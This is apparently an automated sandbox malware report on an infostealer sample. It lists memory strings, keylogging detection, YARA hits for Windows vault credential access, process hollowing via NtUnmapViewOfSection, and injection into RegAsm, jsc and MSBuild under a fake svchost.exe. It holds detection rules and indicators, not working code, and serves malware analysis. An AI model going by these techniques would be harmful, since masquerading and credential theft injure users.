Source: qmgr.db.2.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.2.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.2.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.2.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.2.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: RegAsm.exe, 0000000C.00000002.2545710265.0000000005F17000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2525046983.0000000002B16000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3406933731.000000000308E000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3452363902.0000000006400000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3405626312.00000000014A7000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3454826788.0000000006449000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.3409529944.0000000002A69000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.3451198181.00000000055E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.3452656866.0000000006110000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.3407099977.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: RegAsm.exe, 0000000C.00000002.2545710265.0000000005F17000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2525046983.0000000002B16000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3406933731.000000000308E000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3452363902.0000000006400000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3454826788.0000000006449000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3405626312.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.3409529944.0000000002A69000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.3451198181.00000000055E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.3452656866.0000000006110000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.3407099977.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: LisectAVT_2403002A_29.exe, 00000001.00000002.2287115517.0000021D909E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.19.dr	String found in binary or memory: http://upx.sf.net
Source: svchost.exe, 00000009.00000002.2415909441.000001F244011000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.2394298130.0000021452241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2506543438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2470873767.0000017052012000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2558777544.000001911138A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: qmgr.db.2.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000002.00000003.2203217669.00000298F0BE0000.00000004.00000800.00020000.00000000.sdmp, edb.log.2.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: RegAsm.exe, 0000000C.00000002.2545710265.0000000005F17000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2525046983.0000000002B16000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3406933731.000000000308E000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3452363902.0000000006400000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3454826788.0000000006449000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 0000000F.00000002.3405626312.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.3409529944.0000000002A69000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.3451198181.00000000055E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.3452656866.0000000006110000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.3407099977.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 9.2.svchost.exe.1f244086ce8.1.raw.unpack, hxAF.cs	.Net Code: gcE
Source: 9.2.svchost.exe.1f24404c2a0.0.raw.unpack, hxAF.cs	.Net Code: gcE
Source: 10.2.svchost.exe.214522b6dd8.0.raw.unpack, hxAF.cs	.Net Code: gcE
Source: 10.2.svchost.exe.2145227c390.1.raw.unpack, hxAF.cs	.Net Code: gcE
Source: 24.2.svchost.exe.17052088b18.0.raw.unpack, hxAF.cs	.Net Code: gcE

System Summary

Malicious sample detected (through community Yara rule)

Source: 31.2.svchost.exe.191113c5518.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.svchost.exe.1f24404c2a0.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 24.2.svchost.exe.1705204e0d0.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 31.2.svchost.exe.1911138aad0.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.svchost.exe.214522b6dd8.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 31.2.svchost.exe.1911138aad0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.svchost.exe.1f244086ce8.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.svchost.exe.2145227c390.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 31.2.svchost.exe.191113c5518.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 24.2.svchost.exe.17052088b18.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.svchost.exe.1f244086ce8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 24.2.svchost.exe.17052088b18.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.svchost.exe.1f24404c2a0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.svchost.exe.2145227c390.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.svchost.exe.214522b6dd8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 24.2.svchost.exe.1705204e0d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD346AD66A NtUnmapViewOfSection,		24_2_00007FFD346AD66A
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD346ED66A NtUnmapViewOfSection,		31_2_00007FFD346ED66A

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Code function: 1_2_00007FFD34660C86	1_2_00007FFD34660C86
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Code function: 1_2_00007FFD34656D79	1_2_00007FFD34656D79
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Code function: 1_2_00007FFD34678870	1_2_00007FFD34678870
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Code function: 1_2_00007FFD3465C998	1_2_00007FFD3465C998
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Code function: 1_2_00007FFD34667240	1_2_00007FFD34667240
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Code function: 1_2_00007FFD346612CD	1_2_00007FFD346612CD
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Code function: 1_2_00007FFD3465126C	1_2_00007FFD3465126C
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Code function: 1_2_00007FFD34660FFA	1_2_00007FFD34660FFA
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Code function: 1_2_00007FFD3465E2B0	1_2_00007FFD3465E2B0
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Code function: 1_2_00007FFD3465D3F0	1_2_00007FFD3465D3F0
Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Code function: 1_2_00007FFD347905E1	1_2_00007FFD347905E1
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 9_2_00007FFD34690C86	9_2_00007FFD34690C86
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 9_2_00007FFD34686D79	9_2_00007FFD34686D79
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 9_2_00007FFD346A8870	9_2_00007FFD346A8870
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 9_2_00007FFD34697240	9_2_00007FFD34697240
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 9_2_00007FFD3468CAB8	9_2_00007FFD3468CAB8
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 9_2_00007FFD346865BD	9_2_00007FFD346865BD
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 9_2_00007FFD34690FC7	9_2_00007FFD34690FC7
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 9_2_00007FFD34690FFA	9_2_00007FFD34690FFA
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 9_2_00007FFD3468E2B0	9_2_00007FFD3468E2B0
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 9_2_00007FFD347C082B	9_2_00007FFD347C082B
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 9_2_00007FFD347C13E9	9_2_00007FFD347C13E9
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FFD346A0C86	10_2_00007FFD346A0C86
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FFD34696D79	10_2_00007FFD34696D79
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FFD346B8870	10_2_00007FFD346B8870
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FFD346A7240	10_2_00007FFD346A7240
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FFD346A12CD	10_2_00007FFD346A12CD
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FFD3469126C	10_2_00007FFD3469126C
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FFD346A0FFA	10_2_00007FFD346A0FFA
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FFD3469C998	10_2_00007FFD3469C998
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FFD3469E2B0	10_2_00007FFD3469E2B0
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FFD347D082B	10_2_00007FFD347D082B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_011E9378	12_2_011E9378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_011E9BE8	12_2_011E9BE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_011E4A98	12_2_011E4A98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_011E3E80	12_2_011E3E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_011EE16F	12_2_011EE16F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_011E41C8	12_2_011E41C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_011E9BE2	12_2_011E9BE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 15_2_03014A98	15_2_03014A98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 15_2_03013E80	15_2_03013E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 15_2_0301CE8E	15_2_0301CE8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 15_2_030141C8	15_2_030141C8
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD34693C20	24_2_00007FFD34693C20
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD34691E08	24_2_00007FFD34691E08
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD346A32B1	24_2_00007FFD346A32B1
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD34659000	24_2_00007FFD34659000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD3466C3EA	24_2_00007FFD3466C3EA
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD346A8355	24_2_00007FFD346A8355
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD346AA3E9	24_2_00007FFD346AA3E9
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD346AA121	24_2_00007FFD346AA121
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD34660C86	24_2_00007FFD34660C86
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD3466721D	24_2_00007FFD3466721D
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD3466A71D	24_2_00007FFD3466A71D
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD3465D255	24_2_00007FFD3465D255
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD34660FC7	24_2_00007FFD34660FC7
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD34660FFA	24_2_00007FFD34660FFA
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD3469C7BA	24_2_00007FFD3469C7BA
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD3469D1B3	24_2_00007FFD3469D1B3
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD3469B801	24_2_00007FFD3469B801
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD3469B379	24_2_00007FFD3469B379
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD3465126C	24_2_00007FFD3465126C
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD34656D79	24_2_00007FFD34656D79
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD3467B355	24_2_00007FFD3467B355
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD3467F711	24_2_00007FFD3467F711
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD3467EE85	24_2_00007FFD3467EE85
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD3467DCE1	24_2_00007FFD3467DCE1
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD346864DB	24_2_00007FFD346864DB
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD34675EC6	24_2_00007FFD34675EC6
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD346727D9	24_2_00007FFD346727D9
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_00007FFD34672399	24_2_00007FFD34672399
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 26_2_00E69378	26_2_00E69378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 26_2_00E64A98	26_2_00E64A98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 26_2_00E69B28	26_2_00E69B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 26_2_00E6CDA8	26_2_00E6CDA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 26_2_00E63E80	26_2_00E63E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 26_2_00E641C8	26_2_00E641C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 26_2_00E6E56F	26_2_00E6E56F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 26_2_05E1DD20	26_2_05E1DD20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 26_2_05E1BD18	26_2_05E1BD18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 26_2_05E18C84	26_2_05E18C84
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 26_2_05E13F60	26_2_05E13F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 26_2_05E156F0	26_2_05E156F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 26_2_05E10040	26_2_05E10040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 26_2_05E12AF8	26_2_05E12AF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 26_2_05E15010	26_2_05E15010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 26_2_05E13268	26_2_05E13268
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD346D3C20	31_2_00007FFD346D3C20
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD346D1E08	31_2_00007FFD346D1E08
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD346BB355	31_2_00007FFD346BB355
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD346BF711	31_2_00007FFD346BF711
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD346BDCE1	31_2_00007FFD346BDCE1
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD346A0C86	31_2_00007FFD346A0C86
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD346A721D	31_2_00007FFD346A721D
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD346AA71D	31_2_00007FFD346AA71D
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD346A0FC7	31_2_00007FFD346A0FC7
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD346A0FFA	31_2_00007FFD346A0FFA
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD346DC7BA	31_2_00007FFD346DC7BA
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD346DD1B3	31_2_00007FFD346DD1B3
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD346DB379	31_2_00007FFD346DB379
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD346DB801	31_2_00007FFD346DB801
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD346E32B1	31_2_00007FFD346E32B1
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD34696D79	31_2_00007FFD34696D79
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD346E837A	31_2_00007FFD346E837A
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD346E9FE9	31_2_00007FFD346E9FE9
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD346EA4DE	31_2_00007FFD346EA4DE
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD346E93C2	31_2_00007FFD346E93C2
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD346EBDB8	31_2_00007FFD346EBDB8
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD346EBCFB	31_2_00007FFD346EBCFB
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD346C64DB	31_2_00007FFD346C64DB
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD346B5EC6	31_2_00007FFD346B5EC6
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD346B27D9	31_2_00007FFD346B27D9
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD346B2399	31_2_00007FFD346B2399
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 31_2_00007FFD347D082B	31_2_00007FFD347D082B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 33_2_051B9378	33_2_051B9378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 33_2_051BCDA8	33_2_051BCDA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 33_2_051B3E80	33_2_051B3E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 33_2_051B9B28	33_2_051B9B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 33_2_051B4A98	33_2_051B4A98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 33_2_051B41C8	33_2_051B41C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 33_2_062356F0	33_2_062356F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 33_2_06233F60	33_2_06233F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 33_2_0623DD20	33_2_0623DD20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 33_2_0623BD18	33_2_0623BD18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 33_2_06232AF8	33_2_06232AF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 33_2_06238BA2	33_2_06238BA2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 33_2_06230040	33_2_06230040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 33_2_06233268	33_2_06233268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 33_2_06235010	33_2_06235010

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 464 -p 1808 -ip 1808

Source: svchost.exe.1.dr	Static PE information: No import functions for PE file found
Source: LisectAVT_2403002A_29.exe	Static PE information: No import functions for PE file found

Source: LisectAVT_2403002A_29.exe, 00000001.00000000.2154463562.0000021D8EBB2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameHFayo.exe, vs LisectAVT_2403002A_29.exe
Source: LisectAVT_2403002A_29.exe	Binary or memory string: OriginalFilenameHFayo.exe, vs LisectAVT_2403002A_29.exe

Source: 31.2.svchost.exe.191113c5518.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.svchost.exe.1f24404c2a0.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 24.2.svchost.exe.1705204e0d0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 31.2.svchost.exe.1911138aad0.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.svchost.exe.214522b6dd8.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 31.2.svchost.exe.1911138aad0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.svchost.exe.1f244086ce8.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.svchost.exe.2145227c390.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 31.2.svchost.exe.191113c5518.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 24.2.svchost.exe.17052088b18.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.svchost.exe.1f244086ce8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 24.2.svchost.exe.17052088b18.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.svchost.exe.1f24404c2a0.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.svchost.exe.2145227c390.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
